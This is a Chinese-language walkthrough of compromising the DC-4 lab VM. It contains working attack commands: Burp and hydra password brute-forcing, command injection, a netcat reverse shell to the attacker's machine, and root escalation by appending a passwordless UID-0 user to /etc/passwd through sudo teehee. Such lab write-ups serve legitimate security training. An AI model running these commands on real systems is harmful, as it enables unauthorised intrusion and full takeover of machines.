古之立大事者,不惟有超世之才,亦必有坚忍不拔之志。这篇文章主要讲述靶机DC-4相关的知识,希望能为你提供帮助。
靶机DC-4靶机下载地址:https://www.five86.com/dc-4.html
扫描靶机所在网段,发现靶机为.133
探测靶机端口服务等
文章图片
文章图片
靶机开放80 22端口 访问下网站,需要用户名密码
文章图片
爆破下密码,用户名应该就是admin/Admin 打开burp,随便输个密码,抓包
文章图片
可以将kali中/usr/share/wordlists下的rockyou.txt文件导入进行暴破 由于这个字典有点大,导入burp太慢,而且跑起来时间太长,导出前1000条跑吧
head -1000 rockyou.txt >
admin.txt
文章图片
这里我换到物理机上的burp跑了稍微快点 Admin没跑出来,用户名换成admin即可
文章图片
登录后发现可以执行命令
文章图片
使用burp改包,cat+/etc/passwd,确认可以执行命令
文章图片
为了方便操作,弹个shell到kali上
nc+192.168.32.128+666+-e+/bin/bash
nc -lvp 666
文章图片
在jim目录下找到old-password.bak文件 将内容复制出来,创建为jim.txt
文章图片
暴破下ssh,账户名为jim,密码使用jim.txt 然后使用jim登录ssh
hydra -l jim -P jim.txt ssh://192.168.32.133:22ssh 192.168.32.133 -l jim
pwd=jibril04
文章图片
看了下也没root权限的命令
文章图片
注意下ssh登录提示,you have mail 查看下邮件,charles发来的邮件,里面告诉了密码:^xHhA& hvim0y,直接登录即可
文章图片
文章图片
文章图片
发现这个账户teehee命令有root权限且不需要密码执行,可以用来提权
文章图片
teehee提权 可以通过passwd文件的格式来分析 uid gid 都为0 用/bin/bash来执行,相当于创建了个root权限的用户
echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
test::0:0:::/bin/bash
文章图片
文章图片
【靶机DC-4】获取root权限后,在root目录下找到本次的flag
文章图片
推荐阅读
- 性能工具之ab压力测试工具及ab命令详解
- 空窗2年,中文系萌妹拿下39W测试岗,还和面试官约上了烧烤(!)
- 常用正则表达式最强汇总(含Python代码举例讲解+爬虫实战)
- 比POSTMAN更好用!在国产接口调试工具APIPOST中使用Mock
- C语言进阶—— 动态内存开辟+柔性数组
- Mongodb副本集管理
- paip.java win程序迁移linux的最佳实践
- rpush(多平台统一消息推送系统)
- 赋能生态,合力同行!博睿数据成为光合组织成员单位